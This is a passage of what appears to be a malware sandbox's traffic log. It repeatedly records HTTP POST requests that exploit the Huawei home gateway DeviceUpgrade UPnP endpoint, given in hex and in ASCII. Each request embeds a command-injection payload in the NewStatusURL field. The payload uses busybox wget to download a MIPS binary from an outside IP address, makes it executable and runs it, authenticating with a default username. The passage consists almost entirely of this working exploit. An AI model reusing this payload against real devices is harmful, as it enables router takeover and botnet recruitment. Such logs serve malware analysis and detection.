s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
